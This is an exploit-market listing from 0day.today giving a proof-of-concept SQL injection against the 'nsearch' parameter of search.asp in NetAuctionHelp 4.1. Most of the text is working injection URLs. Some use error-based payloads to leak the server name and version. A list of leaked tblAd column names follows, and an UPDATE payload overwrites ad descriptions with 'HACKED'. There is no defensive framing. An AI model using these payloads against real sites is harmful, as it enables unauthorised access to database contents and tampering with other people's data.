[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NetAuctionHelp 4.1 (nsearch) Remote SQL Injection Vulnerability

Author
Aria-Security Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2302
Category
web applications
Date add
22-11-2007
Platform
unsorted
===============================================================
NetAuctionHelp 4.1 (nsearch) Remote SQL Injection Vulnerability
===============================================================


------------------------
Vendor: http://www.netauctionhelp.com

PoC:
search.asp ?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--



tblAd.id
tblAd.aspectratio
tblAd.title
tblAd.imagepath
tblAd.startdate
tblAd.enddate
tblAd.id_seller
tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

this code with update itemdetl.asp?id=1




#  0day.today [2024-11-15]  #